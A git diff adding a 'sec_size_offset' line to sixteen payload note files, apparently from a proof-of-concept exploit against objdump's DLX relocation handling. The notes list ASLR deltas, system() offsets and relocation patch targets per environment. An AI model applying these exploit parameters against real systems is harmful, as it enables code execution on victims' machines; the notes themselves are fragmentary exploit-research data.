sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes index 1df0678..7cfc562 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes index 0bf618e..a65a88d 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes index bda170c..1d099c5 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes index fbffd37..342cbd3 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes index ebcca2d..bc9a3dc 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes index ebb5905..11a399f 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes index aec6788..6dff12b 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes index d7b8c0d..e073dc0 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 +sec_size_offset=0x38 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes index e1c8e29..dd5f145 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes index 5753377..25a4ab0 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes index b0e207e..4c7cea5 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes index 1621122..e4f5894 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes index 5415420..94e164d 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes index 3d01956..d740060 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes index 964b79a..bd45c2b 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7042e500.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7042e500 command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes index 0e9cf28..6d0fa2e 100644 --- a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e4ff.notes @@ -5,6 +5,7 @@ wide_delta=0x4fff0000 system_delta=0x7043e4ff command=P off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3